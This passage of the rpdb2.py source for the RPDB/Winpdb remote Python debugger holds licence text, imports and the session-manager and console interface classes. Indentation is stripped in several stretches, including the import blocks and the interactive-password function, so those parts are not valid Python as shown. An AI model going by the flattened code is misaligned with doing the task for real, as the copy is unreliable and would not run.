give any third party, for a charge no more than your cost of physically
performing source distribution, a complete machine-readable copy of the
corresponding source code, to be distributed under the terms of Sections
1 and 2 above on a medium customarily used for software interchange; or,
c) Accompany it with the information you received as to the offer to
distribute corresponding source code. (This alternative is allowed only
for noncommercial distribution and only if you received the program in
object code or executable form with such an offer, in accord with
Subsection b above.)
The source code for a work means the preferred form of the work for making
modifications to it. For an executable work, complete source code means all
the source code for all modules it contains, plus any associated interface
definition files, plus the scripts used to control compilation and
installation of the executable. However, as a special exception, the source
code distributed need not include anything that is normally distributed (in
either source or binary form) with the major components (compiler, kernel,
and so on) of the operating system on which the executable runs, unless that
component itself accompanies the executable.
If distribution of executable or object code is made by offering access to
copy from a designated place, then offering equivalent access to copy the
source code from the same place counts as distribution of the source code,
even though third parties are not compelled to copy the source along with
the object code.
4. You may not copy, modify, sublicense, or distribute the Program except as
expressly provided under this License. Any attempt otherwise to copy, modify,
sublicense or distribute the Program is void, and will automatically
terminate your rights under this License. However, parties who have received
copies, or rights, from you under this License will not have their licenses
terminated so long as such parties remain in full compliance.
5. You are not required to accept this License, since you have not signed it.
However, nothing else grants you permission to modify or distribute the
Program or its derivative works. These actions are prohibited by law if you
do not accept this License. Therefore, by modifying or distributing the
Program (or any work based on the Program), you indicate your acceptance of
this License to do so, and all its terms and conditions for copying,
distributing or modifying the Program or works based on it.
6. Each time you redistribute the Program (or any work based on the Program),
the recipient automatically receives a license from the original licensor to
copy, distribute or modify the Program subject to these terms and conditions.
You may not impose any further restrictions on the recipients' exercise of
the rights granted herein. You are not responsible for enforcing compliance
by third parties to this License.
7. If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or otherwise)
that contradict the conditions of this License, they do not excuse you from
the conditions of this License. If you cannot distribute so as to satisfy
simultaneously your obligations under this License and any other pertinent
obligations, then as a consequence you may not distribute the Program at all.
For example, if a patent license would not permit royalty-free redistribution
of the Program by all those who receive copies directly or indirectly through
you, then the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.
If any portion of this section is held invalid or unenforceable under any
particular circumstance, the balance of the section is intended to apply and
the section as a whole is intended to apply in other circumstances.
It is not the purpose of this section to induce you to infringe any patents
or other property right claims or to contest validity of any such claims;
this section has the sole purpose of protecting the integrity of the free
software distribution system, which is implemented by public license
practices. Many people have made generous contributions to the wide range of
software distributed through that system in reliance on consistent
application of that system; it is up to the author/donor to decide if he or
she is willing to distribute software through any other system and a licensee
cannot impose that choice.
This section is intended to make thoroughly clear what is believed to be a
consequence of the rest of this License.
8. If the distribution and/or use of the Program is restricted in certain
countries either by patents or by copyrighted interfaces, the original
copyright holder who places the Program under this License may add an
explicit geographical distribution limitation excluding those countries,
so that distribution is permitted only in or among countries not thus
excluded. In such case, this License incorporates the limitation as if
written in the body of this License.
9. The Free Software Foundation may publish revised and/or new versions of
the General Public License from time to time. Such new versions will be
similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and
"any later version", you have the option of following the terms and
conditions either of that version or of any later version published by the
Free Software Foundation. If the Program does not specify a version number
of this License, you may choose any version ever published by the
Free Software Foundation.
10. If you wish to incorporate parts of the Program into other free programs
whose distribution conditions are different, write to the author to ask for
permission. For software which is copyrighted by the Free Software
Foundation, write to the Free Software Foundation; we sometimes make
exceptions for this. Our decision will be guided by the two goals of
preserving the free status of all derivatives of our free software and of
promoting the sharing and reuse of software generally.
NO WARRANTY
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR
THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE
STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE
PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND
PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE,
YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO
LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR
THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
END OF TERMS AND CONDITIONS
"""
if '.' in __name__:
raise ImportError('rpdb2 must not be imported as part of a package!')
import subprocess
import threading
import traceback
import zipimport
import tempfile
import __main__
import platform
import operator
import weakref
import os.path
import zipfile
import pickle
import socket
import getopt
import string
import random
import base64
import atexit
import locale
import codecs
import signal
import errno
import time
import copy
import hmac
import stat
import zlib
import sys
import cmd
import imp
import os
import re
try:
import hashlib
_md5 = hashlib.md5
except:
import md5
_md5 = md5
try:
import compiler
import sets
except:
pass
try:
import popen2
except:
pass
try:
from Crypto.Cipher import DES
except ImportError:
pass
#
# Pre-Import needed by my_abspath1
#
try:
from nt import _getfullpathname
except ImportError:
pass
try:
import SimpleXMLRPCServer
import xmlrpclib
import SocketServer
import commands
import copy_reg
import httplib
import thread
except:
#
# The above modules were renamed in Python 3 so try to import them 'as'
#
import xmlrpc.server as SimpleXMLRPCServer
import xmlrpc.client as xmlrpclib
import socketserver as SocketServer
import subprocess as commands
import copyreg as copy_reg
import http.client as httplib
import _thread as thread
#
# Needed in py3k path.
#
import numbers
#
#-------------------------------- Design Notes -------------------------------
#
"""
Design:
RPDB2 divides the world into two main parts: debugger and debuggee.
The debuggee is the script that needs to be debugged.
The debugger is another script that attaches to the debuggee for the
purpose of debugging.
Thus RPDB2 includes two main components: The debuggee-server that runs
in the debuggee and the session-manager that runs in the debugger.
The session manager and the debuggee-server communicate via XML-RPC.
The main classes are: CSessionManager and CDebuggeeServer
"""
#
#--------------------------------- Export functions ------------------------
#
TIMEOUT_FIVE_MINUTES = 5 * 60.0
def start_embedded_debugger(
    _rpdb2_pwd,
    fAllowUnencrypted = True,
    fAllowRemote = False,
    timeout = TIMEOUT_FIVE_MINUTES,
    source_provider = None,
    fDebug = False,
    depth = 0
    ):
    """
    Use 'start_embedded_debugger' to invoke the debugger engine in embedded
    scripts. put the following line as the first line in your script:

    import rpdb2; rpdb2.start_embedded_debugger(<some-password-string>)

    This will cause the script to freeze until a debugger console attaches.

    _rpdb2_pwd - The password that governs security of client/server communication.

    fAllowUnencrypted - Allow unencrypted communications. Communication will
        be authenticated but encrypted only if possible.

    fAllowRemote - Allow debugger consoles from remote machines to connect.

    timeout - Seconds to wait for attachment before giving up. Once the
        timeout period expires, the debuggee will resume execution.
        If None, never give up. If 0, do not wait at all.

    source_provider - When script source is not available on file system it is
        possible to specify a function that receives a "filename" and returns
        its source. If filename specifies a file that does not fall under
        the jurisdiction of this function it should raise IOError. If this
        function is responsible for the specified file but the source is
        not available it should raise IOError(SOURCE_NOT_AVAILABLE). You can
        study the way source_provider_blender() works. Note that a misbehaving
        function can break the debugger.

    fDebug - debug output.

    depth - Depth of the frame in which the debugger should be started. This
        defaults to '0' so the top of stack will be in the code where
        start_embedded_debugger is called.

    IMPORTANT SECURITY NOTE:
    USING A HARDCODED PASSWORD MAY BE UNSECURE SINCE ANYONE WITH READ
    PERMISSION TO THE SCRIPT WILL BE ABLE TO READ THE PASSWORD AND CONNECT TO
    THE DEBUGGER AND DO WHATEVER THEY WISH VIA THE 'EXEC' DEBUGGER COMMAND.

    It is safer to use: start_embedded_debugger_interactive_password()
    """

    # depth + 2 skips this wrapper's own frames so the break is attributed
    # to the caller's code.
    return __start_embedded_debugger(
        _rpdb2_pwd,
        fAllowUnencrypted,
        fAllowRemote,
        timeout,
        source_provider,
        fDebug,
        depth + 2
        )
def start_embedded_debugger_interactive_password(
fAllowUnencrypted = True,
fAllowRemote = False,
timeout = TIMEOUT_FIVE_MINUTES,
source_provider = None,
fDebug = False,
stdin = sys.stdin,
stdout = sys.stdout,
depth = 0
):
if g_server is not None:
return
while True:
if stdout is not None:
stdout.write('Please type password:')
_rpdb2_pwd = stdin.readline().rstrip('\n')
_rpdb2_pwd = as_unicode(_rpdb2_pwd, detect_encoding(stdin), fstrict = True)
try:
return __start_embedded_debugger(
_rpdb2_pwd,
fAllowUnencrypted,
fAllowRemote,
timeout,
source_provider,
fDebug,
depth + 2
)
except BadArgument:
stdout.write(STR_PASSWORD_BAD)
def settrace():
    """
    Trace threads that were created with thread.start_new_thread()
    To trace, call this function from the thread target function.

    NOTE: The main thread and any threads created with the threading module
    are automatically traced, and there is no need to invoke this function
    for them.

    Note: This call does not pause the script.
    """
    return __settrace()
def setbreak(depth = 0):
    """
    Pause the script for inspection at next script statement.

    depth - number of extra caller frames to skip when attributing the
        break; 0 breaks at the direct caller.
    """
    # depth + 2 skips this wrapper's own frames.
    return __setbreak(depth + 2)
def set_temp_breakpoint(path, scopename = '', lineno = 1):
    """
    Set a temporary breakpoint in a file. path must be an absolute path.
    scopename can either be an empty string or a fully qualified scope name
    (For example u'g_debugger.m_bp_manager.set_temp_breakpoint'). lineno is
    either relative to file start or to scope start.

    To set a temporary breakpoint to hit when a file is first
    imported or exec-uted call set_temp_breakpoint(path)

    This function may throw a variety of exceptions.
    """
    # Normalize both strings to Unicode before handing off to the engine.
    path = as_unicode(path, fstrict = True)
    scopename = as_unicode(scopename, fstrict = True)

    return __set_temp_breakpoint(path, scopename, lineno)
#
#----------------------------------- Interfaces ------------------------------
#
VERSION = (2, 4, 8, 0, 'Tychod')
RPDB_TITLE = "RPDB 2.4.8 - Tychod"
RPDB_VERSION = "RPDB_2_4_8"
RPDB_COMPATIBILITY_VERSION = "RPDB_2_4_0"
def get_version():
    """Return the full RPDB version string (e.g. "RPDB_2_4_8")."""
    return RPDB_VERSION
def get_interface_compatibility_version():
    """Return the oldest RPDB version this interface is compatible with."""
    return RPDB_COMPATIBILITY_VERSION
class CSimpleSessionManager:
    """
    This is a wrapper class that simplifies launching and controlling of a
    debuggee from within another program. For example, an IDE that launches
    a script for debugging purposes can use this class to launch, debug and
    stop a script.
    """

    def __init__(self, fAllowUnencrypted = True):
        # The wrapped session manager does the real work; this class only
        # adds default policy (localhost, no password) and event callbacks.
        self.__sm = CSessionManagerInternal(
            _rpdb2_pwd = None,
            fAllowUnencrypted = fAllowUnencrypted,
            fAllowRemote = False,
            host = LOCALHOST
            )

        # True once the debuggee has resumed from its initial break.
        self.m_fRunning = False

        event_type_dict = {CEventUnhandledException: {}}
        self.__sm.register_callback(self.__unhandled_exception, event_type_dict, fSingleUse = False)

        event_type_dict = {CEventState: {}}
        self.__sm.register_callback(self.__state_calback, event_type_dict, fSingleUse = False)

        event_type_dict = {CEventExit: {}}
        self.__sm.register_callback(self.__termination_callback, event_type_dict, fSingleUse = False)

    def shutdown(self):
        self.__sm.shutdown()

    def launch(self, fchdir, command_line, encoding = 'utf-8', fload_breakpoints = False):
        # Launch the debuggee; command_line is normalized to Unicode using
        # the given encoding before it is handed to the session manager.
        command_line = as_unicode(command_line, encoding, fstrict = True)

        self.m_fRunning = False
        self.__sm.launch(fchdir, command_line, fload_breakpoints)

    def request_go(self):
        # Resume execution of the debuggee.
        self.__sm.request_go()

    def detach(self):
        self.__sm.detach()

    def stop_debuggee(self):
        self.__sm.stop_debuggee()

    def get_session_manager(self):
        # Expose the wrapped session manager for advanced use.
        return self.__sm

    def prepare_attach(self):
        """
        Use this method to attach a debugger to the debuggee after an
        exception is caught.

        Returns (rid, password). On posix the password is passed to the
        debuggee through a temporary file instead, and None is returned
        in its place.
        """
        _rpdb2_pwd = self.__sm.get_password()

        si = self.__sm.get_server_info()
        rid = si.m_rid

        if os.name == 'posix':
            #
            # On posix systems the password is set at the debuggee via
            # a special temporary file.
            #
            create_pwd_file(rid, _rpdb2_pwd)
            _rpdb2_pwd = None

        return (rid, _rpdb2_pwd)

    #
    # Override these callbacks to react to the related events.
    #

    def unhandled_exception_callback(self):
        _print('unhandled_exception_callback')
        self.request_go()

    def script_paused(self):
        _print('script_paused')
        self.request_go()

    def script_terminated_callback(self):
        _print('script_terminated_callback')

    #
    # Private Methods
    #

    def __unhandled_exception(self, event):
        self.unhandled_exception_callback()

    def __termination_callback(self, event):
        self.script_terminated_callback()

    def __state_calback(self, event):
        """
        Handle state change notifications from the debuggee.
        """
        # NOTE(review): 'calback' (single 'l') is the historical name; it is
        # referenced consistently in __init__, so it is left unchanged.

        if event.m_state != STATE_BROKEN:
            return

        if not self.m_fRunning:
            #
            # First break comes immediately after launch.
            #
            print_debug('Simple session manager continues on first break.')
            self.m_fRunning = True
            self.request_go()
            return

        if self.__sm.is_unhandled_exception():
            return

        sl = self.__sm.get_stack(tid_list = [], fAll = False)
        if len(sl) == 0:
            self.request_go()
            return

        st = sl[0]
        s = st.get(DICT_KEY_STACK, [])
        if len(s) == 0:
            self.request_go()
            return

        # Innermost frame: e[0] is the filename, e[2] the function name.
        e = s[-1]

        function_name = e[2]  # NOTE(review): unused; kept to document the frame tuple layout
        filename = os.path.basename(e[0])

        if filename != DEBUGGER_FILENAME:
            #
            # This is a user breakpoint (e.g. rpdb2.setbreak())
            #
            self.script_paused()
            return

        #
        # This is the setbreak() before a fork, exec or program
        # termination.
        #
        self.request_go()
        return
class CSessionManager:
    """
    Interface to the session manager.

    This is the interface through which the debugger controls and
    communicates with the debuggee.

    Accepted strings are either utf-8 or Unicode unless specified otherwise.
    Returned strings are Unicode (also when embedded in data structures).

    You can study the way it is used in StartClient()
    """

    def __init__(self, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host):
        if _rpdb2_pwd is not None:
            # NOTE(review): assert is stripped under -O; kept for backward
            # compatibility since callers may rely on AssertionError.
            assert is_valid_pwd(_rpdb2_pwd)
            _rpdb2_pwd = as_unicode(_rpdb2_pwd, fstrict = True)

        self.__smi = CSessionManagerInternal(
            _rpdb2_pwd,
            fAllowUnencrypted,
            fAllowRemote,
            host
            )

    def shutdown(self):
        return self.__smi.shutdown()

    def set_printer(self, printer):
        """
        'printer' is a function that takes one argument and prints it.
        You can study CConsoleInternal.printer() as example for use
        and rationale.
        """
        return self.__smi.set_printer(printer)

    def report_exception(self, type, value, tb):
        """
        Sends exception information to the printer.
        """
        return self.__smi.report_exception(type, value, tb)

    def register_callback(self, callback, event_type_dict, fSingleUse):
        """
        Receive events from the session manager.
        The session manager communicates its state mainly by firing events.
        You can study CConsoleInternal.__init__() as example for use.
        For details see CEventDispatcher.register_callback()
        """
        return self.__smi.register_callback(
                                callback,
                                event_type_dict,
                                fSingleUse
                                )

    def remove_callback(self, callback):
        return self.__smi.remove_callback(callback)

    def refresh(self):
        """
        Fire again all relevant events needed to establish the current state.
        """
        return self.__smi.refresh()

    def launch(self, fchdir, command_line, encoding = 'utf-8', fload_breakpoints = True):
        """
        Launch debuggee in a new process and attach.
        fchdir - Change current directory to that of the debuggee.
        command_line - command line arguments pass to the script as a string.
        fload_breakpoints - Load breakpoints of last session.

        if command line is not a unicode string it will be decoded into unicode
        with the given encoding
        """
        command_line = as_unicode(command_line, encoding, fstrict = True)

        return self.__smi.launch(fchdir, command_line, fload_breakpoints)

    def restart(self):
        """
        Restart debug session with same command_line and fchdir arguments
        which were used in last launch.
        """
        return self.__smi.restart()

    def get_launch_args(self):
        """
        Return command_line and fchdir arguments which were used in last
        launch as (last_fchdir, last_command_line).
        Returns (None, None) if there is no info.
        """
        return self.__smi.get_launch_args()

    def attach(self, key, name = None, encoding = 'utf-8'):
        """
        Attach to a debuggee (establish communication with the debuggee-server)
        key - a string specifying part of the filename or PID of the debuggee.

        if key is not a unicode string it will be decoded into unicode
        with the given encoding
        """
        key = as_unicode(key, encoding, fstrict = True)

        return self.__smi.attach(key, name)

    def detach(self):
        """
        Let the debuggee go...
        """
        return self.__smi.detach()

    def request_break(self):
        return self.__smi.request_break()

    def request_go(self):
        return self.__smi.request_go()

    def request_go_breakpoint(self, filename, scope, lineno):
        """
        Go (run) until the specified location is reached.
        """
        filename = as_unicode(filename, fstrict = True)
        scope = as_unicode(scope, fstrict = True)

        return self.__smi.request_go_breakpoint(filename, scope, lineno)

    def request_step(self):
        """
        Go until the next line of code is reached.
        """
        return self.__smi.request_step()

    def request_next(self):
        """
        Go until the next line of code in the same scope is reached.
        """
        return self.__smi.request_next()

    def request_return(self):
        """
        Go until end of scope is reached.
        """
        return self.__smi.request_return()

    def request_jump(self, lineno):
        """
        Jump to the specified line number in the same scope.
        """
        return self.__smi.request_jump(lineno)

    #
    # REVIEW: should return breakpoint ID
    #
    def set_breakpoint(self, filename, scope, lineno, fEnabled, expr):
        """
        Set a breakpoint.

        filename - (Optional) can be either a file name or a module name,
                   full path, relative path or no path at all.
                   If filename is None or '', then the current module is
                   used.
        scope    - (Optional) Specifies a dot delimited scope for the
                   breakpoint, such as: foo or myClass.foo
        lineno   - (Optional) Specify a line within the selected file or
                   if a scope is specified, a zero-based offset from the
                   start of the scope.
        expr     - (Optional) A Python expression that will be evaluated
                   locally when the breakpoint is hit. The break will
                   occur only if the expression evaluates to true.
        """
        filename = as_unicode(filename, fstrict = True)
        scope = as_unicode(scope, fstrict = True)
        expr = as_unicode(expr, fstrict = True)

        return self.__smi.set_breakpoint(
                                filename,
                                scope,
                                lineno,
                                fEnabled,
                                expr
                                )

    def disable_breakpoint(self, id_list, fAll):
        """
        Disable breakpoints

        id_list - (Optional) A list of breakpoint ids.
        fAll    - disable all breakpoints regardless of id_list.
        """
        return self.__smi.disable_breakpoint(id_list, fAll)

    def enable_breakpoint(self, id_list, fAll):
        """
        Enable breakpoints

        id_list - (Optional) A list of breakpoint ids.
        fAll    - enable all breakpoints regardless of id_list.
        """
        return self.__smi.enable_breakpoint(id_list, fAll)

    def delete_breakpoint(self, id_list, fAll):
        """
        Delete breakpoints

        id_list - (Optional) A list of breakpoint ids.
        fAll    - delete all breakpoints regardless of id_list.
        """
        return self.__smi.delete_breakpoint(id_list, fAll)

    def get_breakpoints(self):
        """
        Return breakpoints in a dictionary of id keys to CBreakPoint values
        """
        return self.__smi.get_breakpoints()

    def save_breakpoints(self, _filename = ''):
        """
        Save breakpoints to file, locally (on the client side)
        """
        return self.__smi.save_breakpoints(_filename)

    def load_breakpoints(self, _filename = ''):
        """
        Load breakpoints from file, locally (on the client side)
        """
        return self.__smi.load_breakpoints(_filename)

    def set_trap_unhandled_exceptions(self, ftrap):
        """
        Set trap-unhandled-exceptions mode.
        ftrap with a value of False means unhandled exceptions will be ignored.
        The session manager default is True.
        """
        return self.__smi.set_trap_unhandled_exceptions(ftrap)

    def get_trap_unhandled_exceptions(self):
        """
        Get trap-unhandled-exceptions mode.
        """
        return self.__smi.get_trap_unhandled_exceptions()

    def set_fork_mode(self, ffork_into_child, ffork_auto):
        """
        Determine how to handle os.fork().

        ffork_into_child - True|False - If True, the debugger will debug the
            child process after a fork, otherwise the debugger will continue
            to debug the parent process.

        ffork_auto - True|False - If True, the debugger will not pause before
            a fork and will automatically make a decision based on the
            value of the ffork_into_child flag.
        """
        return self.__smi.set_fork_mode(ffork_into_child, ffork_auto)

    def get_fork_mode(self):
        """
        Return the fork mode in the form of a (ffork_into_child, ffork_auto)
        flags tuple.
        """
        return self.__smi.get_fork_mode()

    def get_stack(self, tid_list, fAll):
        return self.__smi.get_stack(tid_list, fAll)

    def get_source_file(self, filename, lineno, nlines):
        filename = as_unicode(filename, fstrict = True)

        return self.__smi.get_source_file(filename, lineno, nlines)

    def get_source_lines(self, nlines, fAll):
        return self.__smi.get_source_lines(nlines, fAll)

    def set_frame_index(self, frame_index):
        """
        Set frame index. 0 is the current executing frame, and 1, 2, 3,
        are deeper into the stack.
        """
        return self.__smi.set_frame_index(frame_index)

    def get_frame_index(self):
        """
        Get frame index. 0 is the current executing frame, and 1, 2, 3,
        are deeper into the stack.
        """
        return self.__smi.get_frame_index()

    def set_analyze(self, fAnalyze):
        """
        Toggle analyze mode. In analyze mode the stack switches to the
        exception stack for examination.
        """
        return self.__smi.set_analyze(fAnalyze)

    def set_host(self, host):
        """
        Set host to specified host (string) for attaching to debuggees on
        specified host. host can be a host name or ip address in string form.
        """
        return self.__smi.set_host(host)

    def get_host(self):
        return self.__smi.get_host()

    def calc_server_list(self):
        """
        Calc servers (debuggable scripts) list on specified host.
        Returns a tuple of a list and a dictionary.
        The list is a list of CServerInfo objects sorted by their age
        ordered oldest last.
        The dictionary is a dictionary of errors that were encountered
        during the building of the list. The dictionary has error (exception)
        type as keys and number of occurrences as values.
        """
        return self.__smi.calc_server_list()

    def get_server_info(self):
        """
        Return CServerInfo server info object that corresponds to the
        server (debugged script) to which the session manager is
        attached.
        """
        return self.__smi.get_server_info()

    def get_namespace(self, nl, filter_level, repr_limit = 128, fFilter = "DEPRECATED"):
        """
        get_namespace is designed for locals/globals panes that let
        the user inspect a namespace tree in GUI debuggers such as Winpdb.
        You can study the way it is used in Winpdb.

        nl - List of tuples, where each tuple is made of a python expression
             as string and a flag that controls whether to "expand" the
             value, that is, to return its children as well in case it has
             children e.g. lists, dictionaries, etc...

        filter_level - 0, 1, or 2. Filter out methods and functions from
            classes and objects. (0 - None, 1 - Medium, 2 - Maximum).

        repr_limit - Length limit (approximated) to be imposed on repr() of
             returned items.

        examples of expression lists:

        [('x', false), ('y', false)]
        [('locals()', true)]
        [('a.b.c', false), ('my_object.foo', false), ('another_object', true)]

        Return value is a list of dictionaries, where every element
        in the list corresponds to an element in the input list 'nl'.

        Each dictionary has the following keys and values:
        DICT_KEY_EXPR - the original expression string.
        DICT_KEY_REPR - A repr of the evaluated value of the expression.
        DICT_KEY_IS_VALID - A boolean that indicates if the repr value is
                            valid for the purpose of re-evaluation.
        DICT_KEY_TYPE - A string representing the type of the expression's
                        evaluated value.
        DICT_KEY_N_SUBNODES - If the evaluated value has children like items
                        in a list or in a dictionary or members of a class,
                        etc, this key will have their number as value.
        DICT_KEY_SUBNODES - If the evaluated value has children and the
                        "expand" flag was set for this expression, then the
                        value of this key will be a list of dictionaries as
                        described below.
        DICT_KEY_ERROR - If an error prevented evaluation of this expression
                        the value of this key will be a repr of the
                        exception info: repr(sys.exc_info())

        Each dictionary for child items has the following keys and values:
        DICT_KEY_EXPR - The Python expression that designates this child.
                        e.g. 'my_list[0]' designates the first child of the
                        list 'my_list'
        DICT_KEY_NAME - a repr of the child name, e.g '0' for the first item
                        in a list.
        DICT_KEY_REPR - A repr of the evaluated value of the expression.
        DICT_KEY_IS_VALID - A boolean that indicates if the repr value is
                            valid for the purpose of re-evaluation.
        DICT_KEY_TYPE - A string representing the type of the expression's
                        evaluated value.
        DICT_KEY_N_SUBNODES - If the evaluated value has children like items
                        in a list or in a dictionary or members of a class,
                        etc, this key will have their number as value.
        """
        # Backward compatibility: the deprecated fFilter argument overrides
        # filter_level when supplied.
        if fFilter != "DEPRECATED":
            filter_level = fFilter

        filter_level = int(filter_level)

        return self.__smi.get_namespace(nl, filter_level, repr_limit)

    #
    # REVIEW: remove warning item.
    #
    def evaluate(self, expr):
        """
        Evaluate a python expression in the context of the current thread
        and frame.

        Return value is a tuple (v, w, e) where v is a repr of the evaluated
        expression value, w is always '', and e is an error string if an error
        occurred.

        NOTE: This call might not return since debugged script logic can lead
        to temporary locking or even deadlocking.
        """
        expr = as_unicode(expr, fstrict = True)

        return self.__smi.evaluate(expr)

    def execute(self, suite):
        """
        Execute a python statement in the context of the current thread
        and frame.

        Return value is a tuple (w, e) where w and e are warning and
        error strings (respectively) if an error occurred.

        NOTE: This call might not return since debugged script logic can lead
        to temporary locking or even deadlocking.
        """
        suite = as_unicode(suite, fstrict = True)

        return self.__smi.execute(suite)

    def complete_expression(self, expr):
        """
        Return matching completions for expression.
        Accepted expressions are of the form a.b.c

        Dictionary lookups or functions call are not evaluated. For
        example: 'getobject().complete' or 'dict[item].complete' are
        not processed.

        On the other hand partial expressions and statements are
        accepted. For example: 'foo(arg1, arg2.member.complete' will
        be accepted and the completion for 'arg2.member.complete' will
        be calculated.

        Completions are returned as a tuple of two items. The first item
        is a prefix to expr and the second item is a list of completions.
        For example if expr is 'foo(self.comp' the returned tuple can
        be ('foo(self.', ['complete', 'completion', etc...])
        """
        expr = as_unicode(expr, fstrict = True)

        return self.__smi.complete_expression(expr)

    def set_encoding(self, encoding, fraw = False):
        """
        Set the encoding that will be used as source encoding for execute()
        evaluate() commands and in strings returned by get_namespace().

        The encoding value can be either 'auto' or any encoding accepted by
        the codecs module. If 'auto' is specified, the encoding used will be
        the source encoding of the active scope, which is utf-8 by default.

        The default encoding value is 'auto'.

        If fraw is True, strings returned by evaluate() and get_namespace()
        will represent non ASCII characters as an escape sequence.
        """
        return self.__smi.set_encoding(encoding, fraw)

    def get_encoding(self):
        """
        return the (encoding, fraw) tuple.
        """
        return self.__smi.get_encoding()

    def set_synchronicity(self, fsynchronicity):
        """
        Set the synchronicity mode.

        Traditional Python debuggers that use the inspected thread (usually
        the main thread) to query or modify the script name-space have to
        wait until the script hits a break-point. Synchronicity allows the
        debugger to query and modify the script name-space even if its
        threads are still running or blocked in C library code by using
        special worker threads. In some rare cases querying or modifying data
        in synchronicity can crash the script. For example in some Linux
        builds of wxPython querying the state of wx objects from a thread
        other than the GUI thread can crash the script. If this happens or
        if you want to restrict these operations to the inspected thread,
        turn synchronicity off.

        On the other hand when synchronicity is off it is possible to
        accidentally deadlock or block indefinitely the script threads by
        querying or modifying particular data structures.

        The default is on (True).
        """
        return self.__smi.set_synchronicity(fsynchronicity)

    def get_synchronicity(self):
        return self.__smi.get_synchronicity()

    def get_state(self):
        """
        Get the session manager state. Return one of the STATE_* constants
        defined below, for example STATE_DETACHED, STATE_BROKEN, etc...
        """
        return self.__smi.get_state()

    #
    # REVIEW: Improve data structure.
    #
    def get_thread_list(self):
        return self.__smi.get_thread_list()

    def set_thread(self, tid):
        """
        Set the focused thread to the specified thread.
        tid - either the OS thread id or the zero based index of the thread
              in the thread list returned by get_thread_list().
        """
        return self.__smi.set_thread(tid)

    def set_password(self, _rpdb2_pwd):
        """
        Set the password that will govern the authentication and encryption
        of client-server communication.
        """
        _rpdb2_pwd = as_unicode(_rpdb2_pwd, fstrict = True)

        return self.__smi.set_password(_rpdb2_pwd)

    def get_password(self):
        """
        Get the password that governs the authentication and encryption
        of client-server communication.
        """
        return self.__smi.get_password()

    def get_encryption(self):
        """
        Get the encryption mode. Return True if unencrypted connections are
        not allowed. When launching a new debuggee the debuggee will inherit
        the encryption mode. The encryption mode can be set via command-line
        only.
        """
        return self.__smi.get_encryption()

    def set_remote(self, fAllowRemote):
        """
        Set the remote-connections mode. if True, connections from remote
        machine are allowed. When launching a new debuggee the debuggee will
        inherit this mode. This mode is only relevant to the debuggee.
        """
        return self.__smi.set_remote(fAllowRemote)

    def get_remote(self):
        """
        Get the remote-connections mode. Return True if connections from
        remote machine are allowed. When launching a new debuggee the
        debuggee will inherit this mode. This mode is only relevant to the
        debuggee.
        """
        return self.__smi.get_remote()

    def set_environ(self, envmap):
        """
        Set the environment variables mapping. This mapping is used
        when a new script is launched to modify its environment.

        Example for a mapping on Windows: [('Path', '%Path%;c:\\mydir')]
        Example for a mapping on Linux: [('PATH', '$PATH:~/mydir')]

        The mapping should be a list of tuples where each tuple is
        composed of a key and a value. Keys and Values must be either
        strings or Unicode strings. Other types will raise the BadArgument
        exception.

        Invalid arguments will be silently ignored.
        """
        return self.__smi.set_environ(envmap)

    def get_environ(self):
        """
        Return the current environment mapping.
        """
        return self.__smi.get_environ()

    def stop_debuggee(self):
        """
        Stop the debuggee immediately.
        """
        return self.__smi.stop_debuggee()
class CConsole:
    """
    Interface to a debugger console.
    """
    def __init__(
            self,
            session_manager,
            stdin = None,
            stdout = None,
            fSplit = False
            ):
        """
        Constructor of CConsole

        session_manager - session manager object.
        stdin, stdout - redirection for IO.
        fSplit - Set flag to True when Input and Output belong to different
                 panes. For example take a look at Winpdb.
        """
        self.m_ci = CConsoleInternal(
                        session_manager,
                        stdin,
                        stdout,
                        fSplit
                        )
    def start(self):
        # Start the console (delegates to CConsoleInternal.start()).
        return self.m_ci.start()
    def join(self):
        """
        Wait until the console ends.
        """
        return self.m_ci.join()
    def set_filename(self, filename):
        """
        Set current filename for the console. The current filename can change
        from outside the console when the console is embedded in other
        components, for example take a look at Winpdb.
        """
        filename = as_unicode(filename)
        return self.m_ci.set_filename(filename)
    def complete(self, text, state):
        """
        Return the next possible completion for 'text'.
        If a command has not been entered, then complete against command list.
        Otherwise try to call complete_<command> to get list of completions.
        """
        text = as_unicode(text)
        return self.m_ci.complete(text, state)
    def printer(self, text):
        # Print a line through the internal console's printer.
        text = as_unicode(text)
        return self.m_ci.printer(text)
#
# ---------------------------- Exceptions ----------------------------------
#
class CException(Exception):
    """
    Base exception class for the debugger.
    """
    # The previous explicit __init__ only forwarded *args to
    # Exception.__init__, which is exactly what the inherited constructor
    # already does, so it was removed as redundant.
class BadMBCSPath(CException):
    """
    Raised on Windows systems when the python executable or debugger script
